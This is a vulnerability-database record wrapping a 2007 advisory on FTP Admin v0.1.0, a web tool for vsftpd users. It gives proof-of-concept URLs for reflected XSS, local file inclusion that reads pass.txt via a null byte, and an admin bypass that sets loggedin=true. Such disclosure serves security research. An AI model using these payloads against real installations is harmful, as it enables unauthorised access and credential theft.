{"enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "bulletinFamily": "exploit", "enchantments_done": [], "href": "https://www.seebug.org/vuldb/ssvid-65017", "id": "SSV:65017", "sourceHref": "https://www.seebug.org/vuldb/ssvid-65017", "description": "No description provided by source.", "type": "seebug", "cvss": {"score": 0.0, "vector": "NONE"}, "lastseen": "2017-11-19T17:18:13", "references": [], "modified": "2014-07-01T00:00:00", "reporter": "Root", "status": "cve,poc", "viewCount": 3, "published": "2014-07-01T00:00:00", "cvelist": [], "title": "ftp admin 0.1.0 (lfi/xss/ab) Multiple Vulnerabilities", "sourceData": "\n FTP Admin v0.1.0 - MULTIPLE VULNERABILITIES\r\n\tby Omni\r\n\r\n1) Infos\r\n---------\r\nDate : 2007-11-28\r\nProduct : FTP Admin\r\nVersion : v0.1.0\r\nVendor : http://sourceforge.net/projects/ftpadmin/\r\nVendor Status : 2007-11-30 Informed!\r\n\r\nDescription : FTP admin is a web-based user administration tool, for usage in combination with vsftpd. FTP admin\r\n requires sudo. Features include modification of users and generation of user passwords.\r\n\r\nSource : omnipresent - omni\r\nE-mail : omnipresent[at]NOSPAMemail[dot]it - omni[at]NOSPAMplayhack[dot]net\r\nTeam : Playhack.net Security\r\n\r\n2) Security Issues\r\n-------------------\r\n\r\n--- [ XSS ] ---\r\n===============================================\r\n\r\nI think it is better to let you see a PoC instead of explaining where the bug is.. If you want to know it just look at the \r\nsource code.\r\n\r\n--- [ PoC ] ---\r\n===============\r\n\r\nhttp://localhost/ft/index.php?page=error&error=<b>...</b>\r\nhttp://localhost/ft/index.php?page=error&error=<script>alert(1)</script>\r\n\r\n\r\n--- [ Local File Inclusion ] ---\r\n================================\r\n\r\nTake a look in index.php, line 49:\r\ninclude("$page.php");\r\n\r\nRemember that you have to log in to perform local file inclusion (loggedin = true -> register_globals = On)\r\n\r\n[ Remember that ]\r\nif(!is_file($page . ".php") || (!is_readable($page . ".php"))) {\r\n\t\t$page = "error";\r\n\t\t$error = "Page does not exist or is not readable\\n";\r\n\t}\r\n}\r\n[ /Remember that ]\r\n\r\n--- [ PoC ] ---\r\n===============\r\n\r\nhttp://localhost/ft/index.php?page=pass.txt%00&loggedin=true\r\n\r\nTo see pass.txt ...\r\n\r\n--- [ Admin Bypass ] ---\r\n================================\r\n\r\nToday I'm too lazy to explain what's wrong.. so take a look in the source code and watch the var $loggedin !!\r\n\r\n--- [ PoC ] ---\r\n===============\r\n\r\nTo add a user...\r\n\r\nhttp://localhost/ft/index.php?page=add&loggedin=true\r\n\r\n# milw0rm.com [2007-11-29]\r\n\n ", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645241261, "score": 1659785532, "epss": 1678850553}}